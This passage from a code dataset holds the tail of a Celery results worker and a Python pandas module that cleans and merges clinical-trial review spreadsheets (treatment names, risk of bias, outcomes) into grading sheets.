server.save()\n out.append(server.serialize())\n\n return out\n\n@app.task(queue='result', base=DatabaseTask)\ndef dmap(it, callback):\n # Map a callback over an iterator and return as a group\n callback = subtask(callback)\n return group(callback.clone([arg,]) for arg in it)()\n\nif __name__ == \"__main__\":\n pass\n\n\n","sub_path":"worker/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"68622415","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 15 18:21:17 2021\n\n@author: antonio\n\"\"\"\n\nimport pandas as pd #for creating the spreadsheet \nimport numpy as np #for nan\nimport re as re #for sub\n\n\n#funciones\n\n#esta funcion debe llamarse primero\ndef cleandf(df, total_nan = False): #funcion para dejar la base de datos limpia y con los indices de columnas adecuados\n \n dfr = df.copy()\n max_title = 200 #Para quitar los encabezados con descripciones largas\n \n for i in range(0, len(dfr.index)): #Esto limpia de espacios y enters todo el dataframe\n \n for j in range(0, 
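# Aside: a sketch of the dmap fan-out used above: clone one task signature per
# element and bundle the clones into a celery group. The broker/backend URLs
# are placeholders, and newer Celery spells the legacy 'subtask' helper
# 'signature'.
from celery import Celery, group, signature

demo_app = Celery(broker='memory://', backend='cache+memory://')

@demo_app.task
def square(x):
    return x * x

def dmap_sketch(it, callback):
    sig = signature(callback)
    # One cloned signature per item; calling the group dispatches them all.
    return group(sig.clone([arg]) for arg in it)

job = dmap_sketch(range(4), square.s())  # not applied here: needs a running worker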
len(dfr.columns)): \n \n if type(dfr.iloc[i,j]) == str: \n \n dfr.iloc[i,j] = ' '.join(dfr.iloc[i,j].split()) #Esto limpia todas los strings de espacios de sobra y \"\\n\"\n \n if i < 3 and len(dfr.iloc[i,j]) > max_title: #revisando las primeras filas, quitamos los titulos demasiado largos\n\n dfr.iloc[i,j] = np.nan\n \n aux_dfr = dfr.iloc[:2,:] #Usamos un dataframe auxiliar para limpiar los nombres de las columnas\n \n aux_dfr = aux_dfr.fillna(method = \"ffill\", axis = 1)\n aux_dfr = aux_dfr.fillna(method = \"ffill\", axis = 0)\n dfr = dfr.drop([0, 1, 2]) #y borramos las filas de los encabezados del excel para tener algo mas limpio\n \n mult_index = aux_dfr.T #Transpuesta\n dfr.columns = pd.MultiIndex.from_frame(mult_index) #reindexea con multiindex de 2 niveles \n \n if total_nan == True:\n \n dfr = dfr.replace(\"NR\", np.nan) #reemplaza nr con valores nan\n \n dfr = dfr.loc[:,~dfr.columns.duplicated()] #Comentar esto correctamente, creo que quita los duplicados de nombres de las columnas\n dfr.reset_index(inplace = True, drop = True)\n dfr = dfr.sort_index()\n \n return dfr\n\n\ndef subdf(df, sheet): #obtener las columnas que nos interesen\n #usar despues de cleandf necesariamente\n name_columns =[\"Ref ID\", \"1st Author\"]\n dfr = df.copy()\n #n_trial = 7\n n_risk = 7\n \n if sheet == \"Trial characteristics\": #Sacar subdataframe the trial characteristics\n \n for n in range(1, 20):\n #print(n)\n try:\n dfr[\"Intervention {}\".format(n)]\n name_columns.append(f\"Intervention {n}\")\n\n except KeyError:\n break\n \n #for i in range(1, n):\n \n # name_columns.append(f\"Intervention {i}\")\n \n dfr = dfr[name_columns] \n \n for i in range(1, n):\n \n dfr.drop(f\"Intervention {i} description (dose, duration)\", axis = 1, level = 1, inplace = True)\n \n if f\"Intervention {i} description (dose, duration) revised\" in dfr.columns.get_level_values(1):\n \n dfr.drop(f\"Intervention {i} description (dose, duration) revised\", axis = 1, level = 1, inplace = True)\n \n if sheet == \"Dichotomous outcomes\":\n \n #dfr = dfr\n \n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n dfr.drop(\"Follow-up time (days)\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Number of events\", axis = 1, level = 1, inplace = True)\n \n if sheet == \"Dichotomous outcomes-severity\":\n \n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n dfr.drop(\"Follow-up time (days)\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Number of events\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Justfication\", axis = 1, level = 1, inplace = True)\n \n if sheet == \"Continuous outcomes\": \n \n dfr = dfr\n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n dfr.drop(\"Follow-up time (days)\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Time to symptom resolution or time to clinical improvement criteria\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Measure of central tendency\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Central tendency\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Measure of variability\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Variability\", axis = 1, level = 1, inplace = True)\n \n if sheet == \"Continuous outcomes-severity\": \n \n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n dfr.drop(\"Follow-up time (days)\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Time to symptom resolution or time to clinical improvement criteria\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Measure of central 
tendency\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Central tendency\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Measure of variability\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Variability\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Justfication\", axis = 1, level = 1, inplace = True)\n\n if sheet == \"Risk of bias\": #saca subdate de risk of bias\n \n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n for i in range(1, n_risk):\n \n dfr.drop(f\"Domain {i} justification\", axis = 1, level = 1, inplace = True)\n #dfr.drop('6) Other biases (e.g., competing risks)', axis = 1, level = 1, inplace = True)\n \n return dfr\n\n\ndef check_spelling_manually_lol(lst): #a falta de opciones mejores para spellcheck, y que no hay tantas faltas de ortografia, hacemos spellcheck manualmente\n \n n = len(lst)\n \n for m in range(0, n):\n \n lst[m] = \"\".join(lst[m].rstrip())\n name =lst[m]\n \n \n if name == \"α-lipoic acid\":\n \n lst[m] = \"alpha lipoic acid\"\n \n #if name == \"hydoxychloroquine\" or name == \"Hydroxychloroquine\" or name == \"(hydroxy)chloroquine\":\n if \"y)chloroquine\" in name:\n #print(name)\n lst[m] = \"hydroxychloroquine\"\n \n if \"ychloroquine\" in name:\n #print(name)\n lst[m] = \"hydroxychloroquine\"\n \n if name == \"nano-curcumin\":\n \n lst[m] = \"nanocurcumin\"\n \n if name == \"usual care\" or name == \"control\" or name == \"Placebo\" or name == \"Standard care\":\n \n lst[m] = \"standard care/placebo\"\n \n return lst\n \n\ndef treat_list_grouping(lst, adverse_events = False): #esta funcion agrupa de acuerdo a las directrices que nos mandan\n \n n = len(lst)\n \n for m in range(0, n):\n \n lst[m] = \"\".join(lst[m].rstrip())\n name =lst[m]\n \n if name == \"siltuximab\" or name == \"tocilizumab\":\n \n lst[m] = \"IL6 receptor antagonists\"\n \n if name == \"placebo\" or name == \"standard care\":\n \n lst[m] = \"standard care/placebo\"\n \n if name == \"dexamethasone\" or name == \"methylprednisolone\":\n \n lst[m] = \"corticosteroids\"\n \n if adverse_events == False: #Para la pestaña de efectos adversos necesitamos dejar separado las cloroquinas \n \n if name == \"chloroquine\":\n \n lst[m] = \"hydroxychloroquine\"\n \n if \"nterferon\" in name:\n \n if \"inhaled nebulised\" not in name:\n \n lst[m] = lst[m].replace(\"-\", \" \")\n lst[m] = lst[m][0].lower() + lst[m][1:]\n aux_list = lst[m].split()\n index = [idx for idx, s in enumerate(aux_list) if 'nterferon' in s][0]\n \n if (index + 1) < len(aux_list):\n lst[m] = ' '.join(aux_list[index:index + 2])\n \n else:\n lst[m] = ' '.join(aux_list)\n\n return lst\n\n \ndef clean_treatments_names(df, sheet = \"Trial characteristics\", adverse_events = False, directory_file = 0): \n #esta funcion limpia, con ayuda de treat_list_grouping, \n #los nombres de los tratamientos, ignorando dias y dosis y ordenando los elementos\n dfr=df.copy()\n #n_trial = 7\n \n for n in range(1, 20):\n #print(n)\n try:\n dfr[\"Intervention {}\".format(n)]\n except KeyError:\n break\n \n if n == 1:\n n=2\n \n for i in range(1, n): #Check all cells of names\n \n for j in range(0, len(dfr.index)):\n #revisamos una celda\n if sheet == \"Trial characteristics\":\n \n aux_str = dfr.loc[j, (f\"Intervention {i}\", f\"Intervention {i} name\")]\n \n elif sheet == \"Dichotomous outcomes\" or sheet == \"Dichotomous outcomes-severity\":\n \n aux_str = dfr.loc[j, (\"Intervention name\", \"Intervention name\")]\n \n elif sheet == \"Continuous outcomes\" or sheet == \"Continuous outcomes-severity\":\n \n 
aux_str = dfr.loc[j, (\"Intervention name\", \"Intervention name\")]\n #print(aux_str)\n \n if type(aux_str) == str: #vemos solo los strings\n \n aux_str = re.sub(r\"\\([^)]*\\)\", \"\", aux_str) #esto quita los parentesis\n #aux_str = aux_str[0].lower() + aux_str[1:]\n aux_str = aux_str.strip()\n aux_list = aux_str.split(\", \")\n #aqui va el combinador para entender distintas categorias como una, \n aux_list = check_spelling_manually_lol(aux_list) #como placebo y standard care, en la forma de placebo/standard care\n \n if type(directory_file) != int:\n \n aux_list.sort()\n \n aux_str = \", \".join(aux_list)\n \n if aux_str == \"chloroquine\" or aux_str == \"hydroxychloroquine\":\n \n if adverse_events == False:\n \n aux_str = \"hydroxychloroquine\"\n \n else:\n \n aux_str = aux_str\n \n else:\n \n index_node_list = directory_file.loc[directory_file.isin([aux_str]).any(axis=1)].index.tolist()\n \n if len(index_node_list) == 0:\n\n aux_str = aux_str\n \n else:\n \n index_node = index_node_list[0]\n aux_str = directory_file.loc[index_node,\"Node\"]\n \n aux_list = aux_str.split(\", \")\n \n aux_list = treat_list_grouping(aux_list, adverse_events)\n \n aux_list.sort()\n #reconstruye el string\n if sheet == \"Trial characteristics\":\n \n dfr.loc[j, (f\"Intervention {i}\", f\"Intervention {i} name\")] = \", \".join(aux_list)\n \n elif sheet == \"Dichotomous outcomes\" or sheet == \"Dichotomous outcomes-severity\":\n \n dfr.loc[j, (\"Intervention name\", \"Intervention name\")] = \", \".join(aux_list)\n \n elif sheet == \"Continuous outcomes\" or sheet == \"Continuous outcomes-severity\":\n \n dfr.loc[j, (\"Intervention name\", \"Intervention name\")] = \", \".join(aux_list)\n\n return dfr\n \n\ndef id_order(df): #ordena RefId de forma que si tiene varios strings, los ordena con sort() de forma que todo salga igual\n \n dfr = df.copy()\n \n for i in range(0, len(dfr.index)):\n \n dfr.iloc[i, 0] = str(dfr.iloc[i, 0])\n aux_list = dfr.iloc[i, 0].split(\", \") #necesito el auxiliar ya que sin el no hace el sort()\n aux_list.sort()\n dfr.iloc[i, 0] = \", \".join(aux_list)\n\n return dfr\n\n\n\ndef treatmentsv2(df): #funcion auxiliar para obtener una lista de los medicamentos en un solo dataframe con nombre y numero\n \n dfr = df.copy()\n srs = pd.DataFrame()\n #n_trial = 7\n \n for n in range(1, 20):\n #print(n)\n try:\n aux=dfr[\"Intervention {}\".format(n)]\n except KeyError:\n break\n\n \n for i in range(1, n): \n \n aux = dfr.loc[:, f\"Intervention {i}\"]\n aux = aux.rename(columns = { f\"Intervention {i} name\" : \"name\", \"N randomized\" : \"N\"})\n srs = pd.concat([srs, aux], ignore_index = True, axis = 0)\n \n srs.dropna(inplace = True)\n srs.reset_index(inplace = True, drop = True)\n \n return srs\n\n\n\ndef duplicated_in_study(df, sheet = \"Trial characteristics\"): #Despues de limpiar todo, algunas columnas se repiten dado que quitamos dosis y dias\n \n dfr = df.copy()\n #n_trial = 7\n \n for n in range(1, 20):\n #print(n)\n try:\n dfr[\"Intervention {}\".format(n)]\n except KeyError:\n break\n \n for i in range(1, n):\n \n dfr[(f\"Intervention {i}\", f\"Intervention {i} name\")].replace(\"NR\", np.nan, inplace = True)\n \n for j in range(0, len(dfr.index)): #En todas las filas, revisamos si se repiten los nombres de tratamientos\n \n aux_list = []\n \n for i in range(1, n): #checar si se repiten los nombres\n \n cell = dfr.loc[j, (f\"Intervention {i}\", f\"Intervention {i} name\")]\n \n if pd.isna(cell) == False and type(cell) == str: #solo nos preocupamos en celdas no vacias\n \n if 
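# A standalone sketch of the name-normalisation steps performed by
# clean_treatments_names above: strip parenthesised dose/duration notes,
# split on commas, sort, rejoin. The sample drug names are illustrative only.
import re

def normalize(cell):
    cell = re.sub(r"\([^)]*\)", "", cell).strip()   # drop "(dose, duration)"
    parts = sorted(p.strip() for p in cell.split(","))
    return ", ".join(parts)

print(normalize("remdesivir (200 mg), hydroxychloroquine"))
# -> 'hydroxychloroquine, remdesivir'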
cell not in aux_list: #si el nombre no esta en la lista, la agregamos\n \n aux_list.append(cell)\n \n else: #si esta en la lista, encontramos en que celda y sumamos el numero de pacientes a la celda correspondiente\n \n index_of_column = list(dfr.loc[j, :]).index(cell)\n dfr.iloc[j, index_of_column +1] += dfr.loc[j, (f\"Intervention {i}\", \"N randomized\")]\n #borramos el nombre y cantidad que se repiten, dado que ya lo sumamos\n dfr.loc[j, (f\"Intervention {i}\", f\"Intervention {i} name\")] = float(\"NaN\")\n dfr.loc[j, (f\"Intervention {i}\", \"N randomized\")] = float(\"NaN\")\n\n return dfr\n\n\ndef cross_treatments(df): #saca nuevas filas relacionando diferentes intervenciones dentro del mismo estudio\n \n the_columns = [\"Treatment 1\", \"Treatment 2\", \"Ref ID\", \"1st Author\", \"Total N\"]\n dfr = pd.DataFrame(columns = the_columns)\n #n_trial = 7\n\n for n in range(1, 20):\n #print(n)\n try:\n dfr[\"Intervention {}\".format(n)]\n except KeyError:\n break\n \n for i in range(0, len(df.index)):\n \n for j in range(1, n):\n \n cell1 = df.loc[i, (f\"Intervention {j}\", f\"Intervention {j} name\")]\n num1 = df.loc[i, (f\"Intervention {j}\", \"N randomized\")]\n \n if pd.isna(cell1) == False:\n \n for k in range(j+1, n):\n \n cell2 = df.loc[i, (f\"Intervention {k}\", f\"Intervention {k} name\")]\n num2 = df.loc[i, (f\"Intervention {k}\", \"N randomized\")]\n \n if pd.isna(cell2) == False:\n \n row_to_append = pd.DataFrame(index =[0], columns = the_columns) \n \n aux_string = df.loc[i, (\"Ref ID\", \"Ref ID\")]\n row_to_append.loc[0, \"Ref ID\"] = aux_string\n\n aux_string = df.loc[i, (\"1st Author\", \"1st Author\")]\n row_to_append.loc[0, \"1st Author\"] = aux_string\n \n if pd.isna(num1) == True or type(num1) == str:\n \n df.loc[i, (f\"Intervention {j}\", \"N randomized\")] = 0\n \n if pd.isna(num2) == True or type(num2) == str:\n \n df.loc[i, (f\"Intervention {k}\", \"N randomized\")] = 0\n \n total_patients = df.loc[i, (f\"Intervention {j}\", \"N randomized\")] + \\\n df.loc[i, (f\"Intervention {k}\", \"N randomized\")] #int(filter(str.isdigit, num1)) + int(filter(str.isdigit, num2))\n row_to_append.loc[0, \"Total N\"] = total_patients\n \n if (cell1 != \"standard care/placebo\" and cell1 != \"placebo/standard care\") and (cell2 != \"standard care/placebo\" and cell2 != \"placebo/standard care\"):\n \n sorting_list = [str(cell1), str(cell2)]\n sorting_list.sort()\n \n row_to_append.loc[0, \"Treatment 1\"] = sorting_list[0]\n row_to_append.loc[0, \"Treatment 2\"] = sorting_list[1]\n \n else:\n \n if cell2 == \"standard care/placebo\" or cell2 == \"placebo/standard care\":\n \n row_to_append.loc[0, \"Treatment 1\"] = cell1\n row_to_append.loc[0, \"Treatment 2\"] = cell2\n \n else:\n \n row_to_append.loc[0, \"Treatment 1\"] = cell2\n row_to_append.loc[0, \"Treatment 2\"] = cell1\n \n dfr = dfr.append(row_to_append, ignore_index = True)\n\n return dfr\n\ndef order_treatments_on_2_columns(df):\n \n df.reset_index(inplace = True, drop = True)\n dfr = df.copy()\n treatments1 = 'Intervention name_x'\n treatments2 = 'Intervention name_y'\n #N1 = 'Total N_x'\n #N2 = 'Total N_y'\n \n for i in range(0, len(df.index)):\n \n cell1 = df.loc[i, treatments1]\n #num1 = df.loc[i, N1]\n \n cell2 = df.loc[i, treatments2]\n #num2 = df.loc[i, N2]\n \n if (cell1 != \"standard care/placebo\" and cell1 != \"placebo/standard care\") and (cell2 != \"standard care/placebo\" and cell2 != \"placebo/standard care\"):\n \n sorting_list = [str(cell1), str(cell2)]\n sorting_list.sort()\n \n dfr.loc[i, 
treatments1] = sorting_list[0]\n dfr.loc[i, treatments2] = sorting_list[1]\n \n else:\n \n if cell2 == \"standard care/placebo\" or cell2 == \"placebo/standard care\":\n \n dfr.loc[i, treatments1] = cell1\n dfr.loc[i, treatments2] = cell2 \n \n else:\n \n dfr.loc[i, treatments1] = cell2\n dfr.loc[i, treatments2] = cell1\n \n dfr[\"Total N\"] = dfr[\"Total N_x\"] + dfr[\"Total N_y\"]\n\n return dfr\n\n#get the merge of RoB and one of the other sheets, COnt or Dich\ndef get_partial(dfRoB, dfOut, dich_or_cont):\n \n partial_id = pd.merge(dfRoB, dfOut, on = [\"Ref ID\", dich_or_cont])\n partial_id.drop([\"1st Author_y\"], axis = 1, inplace = True)\n partial_id.rename(columns = {\"1st Author_x\" : \"1st Author\"}, inplace = True)\n \n partial_author = pd.merge(dfRoB, dfOut, on = [\"1st Author\", dich_or_cont])\n partial_author.drop([\"Ref ID_y\"], axis = 1, inplace = True)\n partial_author.rename(columns = {\"Ref ID_x\" : \"Ref ID\"}, inplace = True)\n \n partial = pd.concat([partial_id, partial_author], axis = 0)\n partial.drop_duplicates(subset = partial.columns[1:].tolist(), inplace = True)\n partial.drop_duplicates(subset = partial.columns[0:1].tolist() + \\\n partial.columns[2:].tolist(), inplace = True)\n \n return partial\n\n\n#this function takes both partial merges and vomits the df we need\ndef literally_a_black_box_that_gets_us_what_we_need_lol(df1, df2):\n \n column_order = [\"Treatment 1\", \"Treatment 2\", \"Ref ID\", \"1st Author\", \"Total N\", \"1) Bias arising from the randomization process\", \\\n \"2) Bias due to deviations from the intended intervention\", \"3) Bias due to missing outcome data\", \\\n \"4) Bias in measurement of the outcome\", \"5) Bias in selection of the reported results\", \\\n \"6) Other biases (e.g., competing risks)\", \"Dichotomous Outcome\", \"Continuous Outcome\"]\n\n inner_join_precursors = pd.concat([df1, df2], axis = 0)\n inner_join_precursors.rename(columns = {\"N analyzed\" : \"Total N\"}, inplace = True)\n inner_join_precursors.reset_index(inplace = True, drop = True)\n\n inner_join_precursors = pd.merge(inner_join_precursors, inner_join_precursors, on = inner_join_precursors.columns.values[0:10].tolist())\n inner_join_precursors.drop(inner_join_precursors[inner_join_precursors['Intervention name_x'] == inner_join_precursors['Intervention name_y']].index, inplace = True)\n\n inner_join_precursors = order_treatments_on_2_columns(inner_join_precursors)\n inner_join_precursors.drop([\"Total N_x\", \"Total N_y\"], axis = 1, inplace = True)\n inner_join_precursors = inner_join_precursors[inner_join_precursors.duplicated()] \n inner_join_precursors.reset_index(inplace = True, drop = True)\n inner_join_precursors.rename(columns = {\"Intervention name_x\" : \"Treatment 1\", \"Intervention name_y\" : \"Treatment 2\"}, inplace = True)\n inner_join_precursors = inner_join_precursors[column_order]\n \n \n return inner_join_precursors\n\ndef get_outcomes_ready(df, sheet, adverse_events = False, directory_file = 0, total_nan = False):\n \n dfr = find_int_in_string(id_order(subdf(clean_treatments_names(cleandf(df, total_nan = False), sheet = sheet, directory_file = directory_file), sheet)), start_column = 3, end_column = 4)\n dfr.columns = dfr.columns.get_level_values(1) \n dfr = dfr.groupby([\"Ref ID\", \"1st Author\", \"Intervention name\", \"Outcome\"], as_index = False)[\"N analyzed\"].agg(lambda x: x.sum())\n \n return dfr\n\n#variation of past function for when we can discriminate by severity\ndef get_outcomes_ready_severity(df, sheet, adverse_events 
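# Aside: a sketch of the union-of-merges idea in get_partial above: join once
# on the ID, once on the author, then stack and de-duplicate, so a row matches
# when either key agrees. The column values are illustrative.
import pandas as pd

left = pd.DataFrame({'Ref ID': [1, 2], '1st Author': ['Kim', 'Lee'], 'rob': ['low', 'high']})
right = pd.DataFrame({'Ref ID': [1, 9], '1st Author': ['Kim', 'Lee'], 'out': ['a', 'b']})

by_id = pd.merge(left, right, on='Ref ID', suffixes=('', '_y')).drop(columns='1st Author_y')
by_author = pd.merge(left, right, on='1st Author', suffixes=('', '_y')).drop(columns='Ref ID_y')
union = pd.concat([by_id, by_author]).drop_duplicates()
print(union)  # one row per study matched by ID or by author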
= False, directory_file = 0, total_nan = False):\n \n dfr = find_int_in_string(id_order(subdf(clean_treatments_names(cleandf(df, total_nan = False), sheet = sheet, directory_file = directory_file), sheet)), start_column = 3, end_column = 5)\n dfr.columns = dfr.columns.get_level_values(1) \n dfr = dfr.groupby([\"Ref ID\", \"1st Author\", \"Intervention name\", \"Outcome\", \"Severe\"], as_index = False)[\"N analyzed\"].agg(lambda x: x.sum())\n \n return dfr\n \ndef get_trial_characteristics_ready(df, sheet, adverse_events = False, directory_file = 0, total_nan = False): #aglomerado para sacar el gradeing\n \n \n dfr = cross_treatments(duplicated_in_study(id_order(subdf(clean_treatments_names(cleandf(df, total_nan = total_nan), adverse_events = adverse_events, directory_file = directory_file), sheet))))\n\n return dfr\n\n\ndef get_risk_of_bias_ready(df, sheet, total_nan = False): #aglomerado para sacar el gradeing 2\n \n dfr = id_order(subdf(cleandf(df, total_nan = total_nan), sheet))\n dfr.columns = dfr.columns.get_level_values(1) #Flattens multicolumns\n \n return dfr\n\n#difference between old and new data archives, to find \"# new treatment column\"\n\ndef differences_on_new_doc(df_old, df_new):\n \n if type(df_old) != int:\n df = pd.concat([df_old, df_new])\n \n df = df[[\"Treatment 1\", \"Treatment 2\", \"1st Author\", \"Dichotomous Outcome\", \"Continuous Outcome\"]]\n\n df = df.drop_duplicates(keep = False)\n\n df = df[[\"Treatment 1\", \"Treatment 2\", \"Dichotomous Outcome\", \"Continuous Outcome\"]]\n \n else:\n \n df = df_new.copy()\n df = df[[\"Treatment 1\", \"Treatment 2\", \"Dichotomous Outcome\", \"Continuous Outcome\"]]\n \n return df\n\ndef number_of_new_treatments_column(df_old, df_new):\n \n df = differences_on_new_doc(df_old, df_new)\n\n #count the amount of treatment convinations that are new between gradeing studies\n\n new_treatments_number = df.value_counts(dropna = False).reset_index()\n new_treatments_number.rename(columns = {0 : \"# of new trials\"}, inplace = True)\n\n # finally gets the dataframe ready to export in an excel, ready for formatting\n\n inner_join_precursors = pd.merge(df_new, new_treatments_number, how = 'left', on = [\"Treatment 1\", \"Treatment 2\", \"Dichotomous Outcome\", \"Continuous Outcome\"])\n\n inner_join_precursors[\"# of new trials\"].fillna(value = 0, inplace = True)\n\n #change column of number of new trials of place and group by treatment combination\n\n new_trials_column = inner_join_precursors.pop(\"# of new trials\") \n inner_join_precursors.insert(2, \"# of new trials\", new_trials_column) \n inner_join_precursors.sort_values(by = [\"Treatment 1\", \"Treatment 2\"], inplace = True)\n \n return inner_join_precursors\n \n#finds integers wrongly captured as strings and makes them integers again\n \ndef find_int_in_string(df, start_column = 0, end_column = 1):\n \n dfr = df.copy()\n \n for i in range(0, len(df.index)):\n \n for j in range(start_column, end_column + 1):\n \n cell = dfr.iloc[i, j]\n \n if type(cell) == str:\n \n if any(c.isdigit() for c in cell):\n \n dfr.iloc[i, j] = int(re.sub(\"\\D\", \"\", df.iloc[i, j]))\n \n else:\n \n dfr.iloc[i, j] = np.nan\n \n return dfr \n\n#this function isnt used\ndef subheaders_treatments(df):\n \n dfr = df.copy()\n \n treatment_title = (\"\", \"\")\n \n #treatment_headers = pd.DataFrame().reindex(columns=dfr.columns)\n \n for i in range(0, len(df.index)):\n \n if (dfr.iloc[i, 0], dfr.iloc[i, 1]) != treatment_title:\n \n treatment_title = (dfr.iloc[i, 0], dfr.iloc[i, 1])\n \n else:\n \n 
pass\n \n# call this function to style the risk of bias background colors\n#not used\ndef risk_of_bias_styler(cell):\n \n if cell == \"low risk of bias\":\n \n color = \"#70ad47\"\n \n elif cell == \"probably low risk of bias\":\n \n color = \"yellow\"\n \n elif cell == \"probably high risk of bias\":\n \n color = \"#ed7d31\"\n \n elif cell == \"either probably low or probably high risk of bias\":\n \n color = \"#ed7d31\"\n \n elif cell == \"high risk of bias\":\n \n color = \"red\"\n\n return 'background-color: %s' % color \n\n#insert columns for future data we may want to include, but for now it is empty\n\ndef insert_empty_columns(df, n_column):\n \n df.insert(n_column, \"Characteristic 5\", \"\")\n df.insert(n_column, \"Characteristic 4\", \"\")\n df.insert(n_column, \"Characteristic 3\", \"\")\n df.insert(n_column, \"Characteristic 2\", \"\") \n \n#change the names of the dataframe\ndef correct_column_naming(df):\n \n df.rename(columns = {\"Ref ID\" : \"Trial\", \"1st Author\" : \"First author\", \"Total N\" : \"N\", \\\n '1) Bias arising from the randomization process' : \"Randomization\", \\\n '2) Bias due to deviations from the intended intervention' : \"Deviations from the intended\\nintervention\", \\\n '3) Bias due to missing outcome data' : \"Missing outcome data\", \\\n '4) Bias in measurement of the outcome' : \"Measurement of outcome\", \\\n '5) Bias in selection of the reported results' : \"Selection of the reported\\nresults\", \\\n '6) Other biases (e.g., competing risks)' : \"Other\"}, inplace = True)\n \n#like the last function, but for the dataframe of the merge of dichotomous + continuous and RoB\ndef correct_column_naming_Outcomes(df):\n \n df.rename(columns = {\"Ref ID\" : \"Trial\", \"1st Author\" : \"First author\", \"Total N\" : \"N\", \\\n '1) Bias arising from the randomization process' : \"Randomization\", \\\n '2) Bias due to deviations from the intended intervention' : \"Deviations from the intended\\nintervention\", \\\n '3) Bias due to missing outcome data' : \"Missing outcome data\", \\\n '4) Bias in measurement of the outcome' : \"Measurement of outcome\", \\\n '5) Bias in selection of the reported results' : \"Selection of the reported\\nresults\"}, inplace = True)\n\n\n# Instead of a simple merge, we use this to get what we need, merging by the ID\n#In the future we could \"merge\" using the union of both a 1st author merge and a ID merge\n\ndef pdmerge_id(df1, df2, on = [\"Ref ID\"]):\n \n inner_join_precursors_id = pd.merge(df1, df2, on = on)\n inner_join_precursors_id.drop([\"1st Author_y\"], axis = 1, inplace = True)\n inner_join_precursors_id.rename(columns = {\"1st Author_x\" : \"1st Author\"}, inplace = True)\n\n return inner_join_precursors_id \n\n#aux function to insert empty row \ndef insert_empty_row(x):\n x.loc[-1] = pd.Series([])\n return x\n\n#creates the dataframe for the sheets\n\ndef gradeing_sheet_parse(df, dichotomous_or_continuous, n_outcome):\n \n dfr = df.copy()\n \n dfr = dfr[dfr[dichotomous_or_continuous] == n_outcome]\n dfr = dfr.drop([\"Dichotomous Outcome\", \"Continuous Outcome\"], axis = 1)\n dfr.reset_index(drop=True, inplace=True)\n \n #this part does the grouped by treatments part\n \n treatments_groups = dfr.groupby([\"Treatment 1\", \"Treatment 2\", \"# of new trials\"], \\\n as_index = False)[\"N\"].sum()\n \n dfr = pd.concat([treatments_groups, dfr], axis = 0)\n \n if dichotomous_or_continuous == \"Continuous Outcome\":\n \n dfr = dfr[['Treatment 1', 'Treatment 2', '# of new trials', 'Trial', \\\n 'First author', 
\n#aux function to insert an empty row \ndef insert_empty_row(x):\n    x.loc[-1] = pd.Series([])\n    return x\n\n#creates the dataframe for the sheets\n\ndef gradeing_sheet_parse(df, dichotomous_or_continuous, n_outcome):\n    \n    dfr = df.copy()\n    \n    dfr = dfr[dfr[dichotomous_or_continuous] == n_outcome]\n    dfr = dfr.drop([\"Dichotomous Outcome\", \"Continuous Outcome\"], axis = 1)\n    dfr.reset_index(drop=True, inplace=True)\n    \n    #this part builds the grouped-by-treatments header rows\n    \n    treatments_groups = dfr.groupby([\"Treatment 1\", \"Treatment 2\", \"# of new trials\"], \\\n                                    as_index = False)[\"N\"].sum()\n    \n    dfr = pd.concat([treatments_groups, dfr], axis = 0)\n    \n    if dichotomous_or_continuous == \"Continuous Outcome\":\n        \n        dfr = dfr[['Treatment 1', 'Treatment 2', '# of new trials', 'Trial', \\\n                   'First author', 'N', 'Characteristic 2', 'Characteristic 3', \\\n                   'Characteristic 4', 'Characteristic 5', 'Randomization', \\\n                   'Deviations from the intended\\nintervention', 'Missing outcome data', \\\n                   'Measurement of outcome', 'Selection of the reported\\nresults', 'Other']]\n    \n    else:\n        \n        dfr = dfr[['Treatment 1', 'Treatment 2', '# of new trials', 'Trial', \\\n                   'First author', 'N', 'Characteristic 2', 'Characteristic 3', \\\n                   'Characteristic 4', 'Characteristic 5', 'Randomization', \\\n                   'Deviations from the intended\\nintervention', 'Missing outcome data', \\\n                   'Measurement of outcome', 'Selection of the reported\\nresults']]\n    \n    dfr.sort_values(by = [\"Treatment 1\", \"Treatment 2\"], inplace = True)\n    dfr.reset_index(drop=True, inplace=True)\n    \n    #insert empty rows as the format indicates\n    dfr = dfr.groupby(['Treatment 1', 'Treatment 2'], as_index=False).apply(insert_empty_row)\n    dfr.reset_index(drop=True, inplace=True)\n    \n    for i in range(0, len(dfr.index)):\n        #print(dfr.loc[i, \"Trial\"])\n        if type(dfr.loc[i, \"First author\"]) == str:\n            \n            dfr.loc[i, \"Treatment 1\"] = np.nan\n            dfr.loc[i, \"Treatment 2\"] = np.nan\n            dfr.loc[i, \"# of new trials\"] = np.nan\n    \n    return dfr\n\n#replaces the number coding with the corresponding wording\n    \ndef convert_bias_from_numbers(df):\n    \n    dfr = df.copy()\n    \n    columns = [\"Randomization\", \"Deviations from the intended\\nintervention\", \"Missing outcome data\", \\\n               \"Measurement of outcome\", \"Selection of the reported\\nresults\", \"Other\"]\n    \n    dfr[columns] = dfr[columns].mask(dfr == 1, \"low risk of bias\")\n    dfr[columns] = dfr[columns].mask(dfr == 2, \"probably low risk of bias\")\n    dfr[columns] = dfr[columns].mask(dfr == 3, \"probably high risk of bias\")\n    dfr[columns] = dfr[columns].mask(dfr == 4, \"high risk of bias\")\n    dfr[columns] = dfr[columns].mask(dfr == 23, \"either probably low or probably high risk of bias\")\n    \n    return dfr\n\ndef 